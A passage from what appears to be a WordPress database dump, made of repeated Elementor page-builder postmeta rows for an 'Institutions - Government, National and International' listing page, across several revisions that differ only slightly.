widget\",\"settings\":{\"title\":\"Institutions - Government, National and International\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"488c72e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"53394e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"35b6f4d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_skin_template\":\"3877\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"b2d7711\"}],\"custom_same_height\":\"100%\",\"custom_posts_per_page\":15,\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"institution\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"pagination_type\":\"numbers_and_prev_next\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"baf14d9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(26586,3886,'_elementor_pro_version','3.3.6'),(26587,3887,'_elementor_edit_mode','builder'),(26588,3887,'_elementor_template_type','wp-page'),(26589,3887,'_elementor_version','3.4.0'),(26590,3887,'_wp_page_template','default'),(26591,3887,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions - Government, National and International\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"488c72e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"53394e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"35b6f4d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_skin_template\":\"3877\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"b2d7711\"}],\"custom_same_height\":\"100%\",\"custom_posts_per_page\":15,\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"institution\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"pagination_type\":\"numbers_and_prev_next\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"baf14d9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(26593,3887,'_elementor_pro_version','3.3.6'),(26594,3888,'_elementor_edit_mode','builder'),(26595,3888,'_elementor_template_type','wp-page'),(26596,3888,'_elementor_version','3.4.0'),(26597,3888,'_wp_page_template','default'),(26598,3888,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions - Government, National and International\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"488c72e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"53394e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"35b6f4d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_skin_template\":\"3877\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"b2d7711\"}],\"custom_same_height\":\"100%\",\"custom_posts_per_page\":15,\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"institution\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"pagination_type\":\"numbers_and_prev_next\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"baf14d9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(26600,3888,'_elementor_pro_version','3.3.6'),(26603,3889,'_elementor_edit_mode','builder'),(26604,3889,'_elementor_template_type','wp-page'),(26605,3889,'_elementor_version','3.4.0'),(26606,3889,'_wp_page_template','default'),(26607,3889,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions - Government, National and International\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"488c72e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"53394e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"35b6f4d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_skin_template\":\"3877\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"b2d7711\"}],\"custom_same_height\":\"100%\",\"custom_posts_per_page\":15,\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"institution\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"pagination_type\":\"numbers_and_prev_next\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"baf14d9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(26609,3889,'_elementor_pro_version','3.3.6'),(26611,3890,'_elementor_edit_mode','builder'),(26612,3890,'_elementor_template_type','wp-page'),(26613,3890,'_elementor_version','3.4.0'),(26614,3890,'_wp_page_template','default'),(26615,3890,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions - Government, National and International\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"488c72e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"53394e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"35b6f4d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_skin_template\":\"3877\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"b2d7711\"}],\"custom_same_height\":\"100%\",\"custom_posts_per_page\":15,\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"institution\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"pagination_type\":\"numbers_and_prev_next\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"baf14d9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(26617,3890,'_elementor_pro_version','3.3.6'),(26619,3891,'_elementor_edit_mode','builder'),(26620,3891,'_elementor_template_type','wp-page'),(26621,3891,'_elementor_version','3.4.0'),(26622,3891,'_wp_page_template','default'),(26623,3891,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions - Government, National and International\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"488c72e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"53394e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"35b6f4d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_skin_template\":\"3877\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"b2d7711\"}],\"custom_same_height\":\"100%\",\"custom_posts_per_page\":15,\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"institution\",\"posts_order\":\"asc\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"pagination_type\":\"numbers_and_prev_next\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"baf14d9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(26625,3891,'_elementor_pro_version','3.3.6'),(26628,3892,'_elementor_edit_mode','builder'),(26629,3892,'_elementor_template_type','wp-page'),(26630,3892,'_elementor_version','3.4.0'),(26631,3892,'_wp_page_template','default'),(26632,3892,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions - Government, National and International\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"488c72e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"53394e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"35b6f4d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_skin_template\":\"3877\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"b2d7711\"}],\"custom_same_height\":\"100%\",\"custom_posts_per_page\":15,\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"institution\",\"posts_order\":\"asc\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"pagination_type\":\"numbers_and_prev_next\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"baf14d9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(26634,3892,'_elementor_pro_version','3.3.6'),(26635,3893,'_elementor_edit_mode','builder'),(26636,3893,'_elementor_template_type','wp-page'),(26637,3893,'_elementor_version','3.4.0'),(26638,3893,'_wp_page_template','default'),(26639,3893,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions - Government, National and International\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"488c72e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"53394e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"35b6f4d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_skin_template\":\"3877\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"b2d7711\"}],\"custom_same_height\":\"100%\",\"custom_posts_per_page\":15,\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"institution\",\"posts_order\":\"asc\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"pagination_type\":\"numbers_and_prev_next\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"baf14d9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(26641,3893,'_elementor_pro_version','3.3.6'),(26642,3894,'_elementor_edit_mode','builder'),(26643,3894,'_elementor_template_type','wp-page'),(26644,3894,'_elementor_version','3.4.0'),(26645,3894,'_wp_page_template','default'),(26646,3894,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions - Government, National and International\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"488c72e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"53394e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"35b6f4d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_skin_template\":\"3877\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"b2d7711\"}],\"custom_same_height\":\"100%\",\"custom_posts_per_page\":15,\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"institution\",\"posts_order\":\"asc\",\"pagination_page_limit\":\"5\",\"pagination_numbers_shorten\":\"yes\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"pagination_type\":\"numbers_and_prev_next\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"baf14d9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(26648,3894,'_elementor_pro_version','3.3.6'),(26650,3895,'_elementor_edit_mode','builder'),(26651,3895,'_elementor_template_type','wp-page'),(26652,3895,'_elementor_version','3.4.0'),(26653,3895,'_wp_page_template','default'),(26654,3895,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions - Government, National and International\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"488c72e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"53394e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"35b6f4d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_skin_template\":\"3877\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"b2d7711\"}],\"custom_same_height\":\"100%\",\"custom_posts_per_page\":15,\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"institution\",\"posts_order\":\"asc\",\"pagination_page_limit\":\"5\",\"pagination_numbers_shorten\":\"yes\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"pagination_type\":\"numbers_and_prev_next\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"baf14d9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(26656,3895,'_elementor_pro_version','3.3.6'),(26657,3896,'_elementor_edit_mode','builder'),(26658,3896,'_elementor_template_type','wp-page'),(26659,3896,'_elementor_version','3.4.0'),(26660,3896,'_wp_page_template','default'),(26661,3896,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions - Government, National and International\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"488c72e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"53394e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"35b6f4d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_skin_template\":\"3877\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"b2d7711\"}],\"custom_same_height\":\"100%\",\"custom_posts_per_page\":15,\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"institution\",\"posts_order\":\"asc\",\"pagination_page_limit\":\"5\",\"pagination_numbers_shorten\":\"yes\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"pagination_type\":\"numbers_and_prev_next\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"baf14d9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(26663,3896,'_elementor_pro_version','3.3.6'),(26664,3897,'_elementor_edit_mode','builder'),(26665,3897,'_elementor_template_type','wp-page'),(26666,3897,'_elementor_version','3.4.0'),(26667,3897,'_wp_page_template','default'),(26668,3897,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions - Government, National and International\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"488c72e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"53394e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"35b6f4d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_skin_template\":\"3877\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"b2d7711\"}],\"custom_same_height\":\"100%\",\"custom_posts_per_page\":15,\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"institution\",\"posts_order\":\"asc\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"pagination_type\":\"numbers_and_prev_next\",\"loadmore_text\":\"Load 